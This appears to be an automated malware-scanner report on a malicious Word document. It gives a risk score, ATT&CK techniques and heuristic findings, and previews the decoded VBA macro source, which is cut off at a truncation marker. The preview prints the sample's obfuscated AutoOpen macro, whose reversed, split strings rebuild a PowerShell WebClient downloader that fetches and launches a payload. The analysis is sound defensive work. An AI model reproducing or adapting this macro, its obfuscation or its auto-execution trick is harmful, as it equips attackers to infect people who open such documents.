MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The critical heuristic firing indicates a Shell() call within the VBA code, and the AutoOpen macro marker suggests it will execute automatically upon opening. This functionality is commonly used to download and execute further malicious content.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 130184 bytes |
SHA-256: 9681ea6f7d4c671b4f4cbe660d46f565e950fb27768b3c3698c891fdf3c9995f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "BHoiuPq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub GKjYwN(PmPHb)
Set iWsptJ = OTZOzU
CBszKh = LZPUCr
zjXFG = wYpKt + Atn(GOnlR) + 52476 - 57373 / (72921 * Hex(NuQzu))
WzdUq = 34518 + PnBJq
End Sub
Sub fdMiG(aMYnzt)
Set GBmmH = MrZbL
Cwnzzk = kYGdA
KBTLz = fbRLS + Atn(BuBiOG) + 3499 - 1618 / (87802 * Hex(wmMZD))
IBzXla = 93416 + sjbRf
Set llVWw = GFJAbz
HDhwY = qSPMu
azwlii = UjRNRq + Atn(NiCrzw) + 73254 - 16997 / (79132 * Hex(LhDLp))
VYbiYs = 19706 + bVril
Set qQHztI = YMzFR
taAbZ = lvoqLC
YiQdF = XzMva + Atn(RjizM) + 56655 - 48822 / (12293 * Hex(QtauRw))
uBZwuY = 68815 + IjswuJ
End Sub
Sub faVHwH(cMmwkH)
Set pinIXE = VdKtz
pclbMa = NAYKzs
ZNJwob = SAEpWE + Atn(KwLOB) + 18935 - 16182 / (99554 * Hex(KkJYcp))
dIfHl = 15303 + MEVGX
Set hlpWMD = Nwwio
lwOiD = cqahr
kCczJj = lXuZu + Atn(LZlwhK) + 94345 - 37767 / (23661 * Hex(VzaRr))
lGEwZc = 810 + OmRiDB
End Sub
Sub Autoopen()
On Error Resume Next
Set ZTrrpr = tWudYj
BjPMq = nVwNjY
iutSQ = iviia + Atn(DrMhE) + 92350 - 7211 / (38273 * Hex(NDCSM))
DEWdI = 33178 + LwdbMN
jkzHDdElr (LWApL + zTiBFhbiIDFm + uansRf)
Set qUrrz = uarIE
jWfOD = jpRIqC
HYVdQ = LcMqrH + Atn(cISbUO) + 93005 - 44802 / (52114 * Hex(OMjQi))
nhdods = 60840 + zadsp
End Sub
Sub joGRz(WpncGp)
Set HGQhNd = ZINSIj
tiukDi = kaGSQ
SzuBi = LXShsP + Atn(CwXan) + 16419 - 30829 / (96868 * Hex(LtrCHc))
jJOzV = 38222 + OMjUYE
Set zBUofF = zSJAJ
lAJjjj = lXdSt
WJODnr = CNsXOc + Atn(KhrFz) + 24290 - 58554 / (81057 * Hex(CDooE))
aXCuzj = 5852 + OVIPmY
Set mSELq = jYUhE
vLAzDp = nUUUi
Hzcjpz = RFQljd + Atn(luwhN) + 86521 - 6233 / (14231 * Hex(NWFaZ))
nRzZXi = 12657 + pfkMO
End Sub
Sub vPPZac(WnHllA)
Set OMjWR = SznKFf
qIBcjp = dwGfz
sRdqnm = hodvNu + Atn(XwcFUv) + 94932 - 3885 / (26131 * Hex(iFvivP))
EXUoB = 40927 + XTzwBf
End Sub
Attribute VB_Name = "PlHujWB"
Sub EAqDr(hqzlY)
Set rqasV = fhAzAA
jOTnoP = EtTUwz
jpczLc = OZLPY + Atn(qTKGz) + 80706 - 41280 / (20790 * Hex(OCLWfS))
XFtXzv = 85890 + ApXZS
End Sub
Function zTiBFhbiIDFm()
On Error Resume Next
Set HYPJCk = MUIcSl
amozpQ = GWAIv
nGKSvs = GivNd + Atn(PKlkvi) + 20183 - 34029 / (94913 * Hex(BZjCn))
CPBHJ = 91395 + Kpjac
Set ZGBiph = hYvKV
YzCFjn = ofYBd
iFkqIr = aDovv + Atn(AaZCm) + 15198 - 42029 / (98288 * Hex(PNAash))
uhABs = 6011 + zhnSA
VDXAnOzsGO = twERIa("1%)CDSi'+'R0()'+'P'+'RM'+'metI'+'-'+'e'+'PR'+'M+PR'+'Mk'+'PR'+'M+PRM'+'o'+'v'+'n'+'IP'+'RM(&;)CDSi'+'R'+'0 ,'+')('+'lyTgNt07it0'+'7rtSo'+'T'+'ly'+'T.cfsaiR0('+'lyTelt'+'07I'+'FdaO'+'t'+'07l'+'h@mMEl", 14668 - 14668 + 7 + 14668 - 14668, 14668 - 14668 + 190 + 14668 - 14668)
Set VKGKV = bPdmtH
kpWqhz = XJGutR
HbVzpV = YFGqEF + Atn(oRvHu) + 88470 - 36172 / (58054 * Hex(qFTNqM))
LQEoU = 77668 + nElML
Set WHUGu = fPVfP
NpNzw = Ylpnbp
IznbkA = FWwUHW + Atn(XCnOK) + 52288 - 27517 / (40268 * Hex(bRAsOH))
ifiUm = 23953 + nkfkDq
SnpPsjkJN = twERIa("hX@APqHc[+79]RAHc[( ecALPErC-43]RAHc[,)801]RAHc[+121]RAHc[+48]RAHc[( ECAlPER- 6O3", 68070 - 68070 + 3 + 68070 - 68070, 68070 - 68070 + 74 + 68070 - 68070)
Set trZiBi = ZROYn
MJjHQz = QocBO
KAiiq = iJhZb + Atn(MZTJO) + 31700 - 92611 / (97883 * Hex(fdAXU))
paFPY = 38405 + XBumYN
Set PwIkld = ozvqa
PzTlR = Krajiv
RPAfwz = mrHRVW + Atn(ObvDd) + 94096 - 10171 / (22944 * Hex(JzQUNq))
PZoIMt = 76886 + wspiX
pRzcbiY = twERIa("kE0niR0 = B'+'S'+'NiR'+'0'+';'+'tne'+'ilC'+'beW.te'+'N'+'.met'+'s'+'yS '+')PRM'+'tce'+'jb'+'o-'+'PRM+PR'+'MwP'+'RM+PRMen'+'P'+'R'+'M(. = UYY'+'iR0;modnar )PRMtP'+'RM+PR'+'M'+'cejbo-w'+'PR'+'M+PRM'+kwJZ", 17912 - 17912 + 5 + 17912 - 17912, 17912 - 17912 + 194 + 17912 - 17912)
Set CQuhvQ = cFwYFj
jidXwC = shOqUn
HkHWop = jVmRa + Atn(mUpkH) + 19996 - 95328 / (71611 * Hex(PRmVz))
ijrac = 4259 + UrBRt
Set oCzRrO = sibwsp
PwGPW = FkAWz
GbliK = NpwVvi + Atn(fzLMW) + 63875 - 52493 / (3855 * Hex(vNhWDw))
ECaTkH = 3551 + vQIiz
JiHGVi = twERIa
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.